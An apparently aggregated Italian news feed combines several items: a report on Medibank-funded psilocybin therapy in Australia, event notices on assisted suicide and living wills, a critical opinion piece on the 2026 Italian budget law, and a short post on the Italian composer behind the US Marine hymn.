In linea con i regolamenti della Therapeutic Goods Administration (TGA), la terapia assistita da psilocibina potrà essere prescritta solo a fronte della presenza di una condizione patologica di depressione resistente al trattamento e a seguito del fallimento di tutte le precedenti opzioni terapeutiche. La somministrazione avrà luogo in un ambiente clinico controllato sotto supervisione psichiatrica. Il monitoraggio delle condizioni del paziente potrà essere protratto per un periodo di tempo fino a un anno.In ragione del fatto che la realizzazione del programma ha richiesto lo stanziamento di fondi privati, le terapie non saranno coperte dal sistema sanitario pubblico australiano, e saranno esclusivamente rivolte ai clienti Medibank.I primi risultati delle sperimentazioni avvenute in Australia si sono dimostrati promettenti: secondo il primo studio nazionale in merito, portato avanti dalla Swinburn University of Technology, un trattamento di dodici settimane comprendente due sessioni di somministrazione di psilocibina si è mostrato significativamente efficace nella riduzione dei sintomi depressivi.Nell’ambito della ricerca è stato inoltre osservato come i pazienti che non hanno manifestato miglioramenti non abbiano allo stesso tempo subito effetti avversi né conseguenze negative a livello psicologico.

Dane Stevens, amministratore delegato di Optimi Health, ha dichiarato: “L’inclusione delle nostre capsule di psilocibina nel programma assicurativo di Medibank per la depressione resistente al trattamento riflette il ruolo crescente dei farmaci psichedelici standardizzati nell’assistenza sanitaria mentale assicurata”, concludendo che lo sviluppo del programma “contribuisce a garantire ai pazienti di Medibank l’accesso a terapie precedentemente fuori dalla portata finanziaria e segna un passo importante verso l’integrazione di Optimi nell’assistenza sanitaria regolamentata e garantita dalle assicurazioni”.

L'articolo Avanguardie psichedeliche australiane proviene da Associazione Luca Coscioni.

La valigia della libertà – Storia di una disobbedienza civile

31 ottobre 2025 – ore 21.00
Auditorium municipale Pasquale De Angelis
(c/o Polo Civico di Viale Aldo Ballarin – ingresso/parcheggio via Renato Cesarini 2, Municipio Roma VIII – Ottavo Colle/Tintoretto)
Ingresso gratuito

All’interno della rassegna “Città Visibile – La città diventa palcoscenico”, va in scena “La valigia della libertà. Storia di una disobbedienza civile”, uno spettacolo di e con Valentina Petrini. un racconto teatrale che restituisce voce e dignità alla vicenda di Sibilla Barbieri, Consigliera Generale di Associazione Luca Coscioni per la libertà di ricerca scientifica APS, che ha deciso di porre fine alle proprie sofferenze attraverso il suicidio medicalmente assistito in Svizzera, accompagnata dal figlio.

Con:

• Pasquale Filastò, violoncello
• Paola Bivona, voce e ukulele
• Alessio Podestà, fisarmonica
  Regia di Norma Martelli

Uno spettacolo che racconta la forza della libertà e della disobbedienza civile attraverso parole, musica e storie potenti. Un evento accessibile anche a persone con disabilità, raggiungibile con i mezzi pubblici (716 / 772 – capolinea Ballarin/Cesarini).

Info: 334.2022448
info@cittavisibile.com
www.cittavisibile.com

L'articolo La valigia della libertà – Storia di una disobbedienza civile – a Roma lo spettacolo su Sibilla Barbieri proviene da Associazione Luca Coscioni.

“Lasciatemi morire ridendo” arriva a Saronno – Proiezione del documentario e tavolo informativo sul testamento biologico

Cinema Prealpi – Saronno (VA)
Giovedì 13 novembre 2025
Ore 20:45

Giovedì 13 novembre, alle ore 20:45, presso il Cinema Prealpi di Saronno, si terrà la proiezione del documentario “Lasciatemi morire ridendo” di Massimiliano Fumagalli, che sarà presente in sala insieme a Virginia Rosaschino, produttrice del film, per introdurre la serata.

Alle ore 21:00 inizierà la proiezione del film.

Durante l’evento sarà attivo un tavolo informativo sul testamento biologico a cura della Cellula Coscioni di Varese, per fornire materiali e rispondere a domande su diritti e autodeterminazione.

L'articolo “Lasciatemi morire ridendo” arriva a Saronno (VA) – Proiezione del documentario su Stefano Gheller e tavolo informativo sul testamento biologico proviene da Associazione Luca Coscioni.

Iniziano a circolare in queste ore le bozze della Legge di Bilancio 2026 approvata dal Consiglio dei Ministri venerdì scorso, la prima manovra che si confronta con la modifica delle regole di bilancio europee del 2024 e che quindi dovrebbe abbracciare un periodo temporale pari almeno al triennio, ossia sino al 2028. Ma per il governo Meloni, che sinora ha tirato a campare approvando riforme nel migliore dei casi ininfluenti rispetto al ciclo economico, questo compito è di per sé insormontabile. E così il dicastero di Giorgetti ha prodotto l’ennesima legge priva di Politica, un coacervo di misure una tantum, di aggiustamenti di tiro, di bonus e di finte riforme utili più che altro agli amichetti di partito in campagna elettorale. Nulla di più. Per una paese che avanza con il freno tirato, questo approccio conservativo, persino rigorista – se teniamo presente i risultati differenziali del Bilancio dello Stato proposti con il Documento programmatico di finanza pubblica 2025, approvato dal Parlamento il 9 ottobre – rischia di essere ulteriormente regressivo. Mentre il PNRR è sostanzialmente lasciato scivolare sul suo binario, svuotato delle misure (già poche in origine) che avrebbero potuto ammodernare la nostra società, ormai prossimo alla data fatidica del 2026, anno di restituzione dei fondi non impiegati, i margini di manovra sulla spesa pubblica sono ridotti a “spigolature dei bordi”.

Pensiamo alla nuova – ennesima – riforma IRPEF: il taglio di due punti percentuali (dal 35 al 33 per cento) nello scaglione da 28.000 euro e fino a 50.000 euro verrà eroso dal meccanismo del fiscal drag (stando ai dati divulgati dal Centro Studi CGIL), mentre nessuna misura è prevista per i redditi più bassi (nonostante Meloni abbia sostenuto l’esatto contrario). L’aumento dell’aliquota IRAP di due punti percentuali a carico «degli enti creditizi e le imprese di assicurazione» potrebbe essere in parte neutralizzato dall’esclusione parziale dei dividendi dalla base imponibile IRAP (stando alla bozza della manovra, i dividendi provenienti da società o enti residenti o localizzati in uno Stato membro dell’UE, non concorrono a formare il margine di intermediazione – per banche/finanziarie – o la base imponibile – per le altre società – della società ricevente per il 95 per cento del loro ammontare). La riforma dell’ADI (assegno di inclusione), che consiste nella rimozione di quell’odioso mese di attesa tra scadenza e richiesta di rinnovo, prevede un incremento di spesa che è compensato dalla riduzione del Fondo per il Sostegno alla Povertà e per l’Inclusione Attiva (Art. 1, comma 321, Legge n. 197/2022) di 1,2 miliardi tra il 2026 e il 2029. In materia previdenziale, poi, da un lato si mantengono in essere le misure preesistenti (Ape Sociale, Pensione Anticipata), dall’altro – e nonostante le bellicose intenzioni della Lega espresse in tempo di elezioni – viene ammesso che l’incremento dei requisiti di accesso al sistema pensionistico dovuto alla variazione della speranza di vita, già stabilito per il 1° gennaio 2027, sia «applicato limitatamente a tale anno nella misura di un mese». Il maggiore incremento già stabilito dal decreto direttoriale del Ministero dell’economia e delle finanze è differito al 1° gennaio 2028. Insomma, ci penserà il prossimo governo.

L’impressione, poi, è quella che ci sia una modesta urgenza di fare cassa, anche mettendo a pregiudizio i capisaldi sinora intoccabili. La flat tax dei Paperoni (approvata nel 2017 dal governo Renzi…), o per meglio dire l’imposta forfettaria per il contribuente che trasferisce la propria residenza in Italia, viene aumentata da 200.000 euro a 300.000 euro e l’imposta sostitutiva dei familiari passa da 25 a 50 mila euro. In tema di affitti brevi, la cedolare secca è aumentata dal 21 al 26 per cento per le seconde case date in locazione per periodi brevi, ma nel testo della proposta di legge si precisa che, se non viene esercitata l’opzione della cedolare secca, la ritenuta è considerata operata «a titolo di acconto». Sono bastate poche ore dalla messa in circolazione del testo che questa norma è balzata agli occhi degli esponenti dei partiti di maggioranza. Statene certi, non passerà mai il vaglio del Parlamento.

E la spesa per armamenti? Non aspettatevi norme specifiche nella manovra, resterete delusi. Al netto di qualche stanziamento dedicato soprattutto al rafforzamento del personale dei Carabinieri nelle missioni e nelle sedi estere e all’incremento della dotazione delle Forze di Polizia Penitenziaria (pari a 2000 unità), è invece previsto l’adeguamento dell’età pensionabile del personale militare delle Forze armate (inclusa l’Arma dei carabinieri), del Corpo della Guardia di Finanza e delle Forze di Polizia (che aumenta di tre mesi con decorrenza dal 1° gennaio 2027) e una “Revisione Generale della Spesa” (non ancora quantificata), che tuttavia prevede la riduzione delle dotazioni di competenza e di cassa relative alle missioni e ai programmi di spesa di tutti i Ministeri (incluse le Amministrazioni centrali dello Stato) per gli anni 2026, 2027 e 2028. Staremo a vedere come questa misura verrà mediata con gli accordi politici presi dal governo in sede europea e NATO sull’incremento della spesa per armamenti.

Il governo punta poi a ottenere dei risparmi di spesa dalle Scuole Secondarie (I e II grado) “razionalizzando” le sostituzioni dei docenti su “posto comune” con personale dell’organico dell’autonomia, salvo motivate esigenze di natura didattica. Stesso discorso vale per i posti di Sostegno della Scuola Primaria: le sostituzioni per supplenze temporanee fino a dieci giorni devono essere effettuate utilizzando personale dell’organico dell’autonomia. Attenti, perché il Ministero dell’istruzione e del merito effettuerà un monitoraggio quadrimestrale delle assenze del personale docente e ATA, indicando le modalità di sostituzione e di spesa per le supplenze brevi. I risparmi così ottenuti (quanti?) andrebbero a rafforzare l’offerta formativa. Mah. L’Università, poi, si deve accontentare dell’incremento di 250 milioni di euro della dotazione del Fondo integrativo statale per la concessione di borse di studio (di cui al D.Lgs. 68/2012).

Dulcis in fundo, non poteva mancare un bonus agli studenti che abbiano conseguito il diploma finale entro l’anno di compimento del diciannovesimo anno di età. Una bella “Carta Valore” utilizzabile per l’acquisto di biglietti per eventi culturali, libri, abbonamenti, musica, strumenti musicali e per sostenere i costi di corsi di musica, teatro, danza o lingua straniera (180 milioni di euro la spesa prevista). Ma attenti al giochino: la “Carta della cultura Giovani” e la “Carta del merito” cessano di applicarsi dal 1° gennaio 2027.

Articolo pubblicato anche su www.ossigeno.net

L'articolo La manovra di Meloni e Giorgetti è senza politica proviene da Possibile.

La musica dell’inno dei Marine – il più antico delle Forze Armate americane - è stata scritta da un italiano, Francesco Maria Scala, adattando un’opera del musicista Jacques Offenbach (1819-1880) la “Genevieve de Brabant”, presentata a Parigi il 19 novembre 1859. Scala – per certi versi sorprendente ad apprendersi - era allora Direttore della Banda dei Marine, ed è stato uno dei quattro di origini italiane che sino ad ora hanno guidato tale prestigioso complesso musicale

Scopri di più su tuttostoria.net 👇
tuttostoria.net/storia-contemp…

ed ascolta su yewtu.be l'Inno dei Marine!
yewtu.be/watch?v=Qqv6tzeJ9R4

#USMB #FrancisScala #MarineBand #storiamilitare

@Storia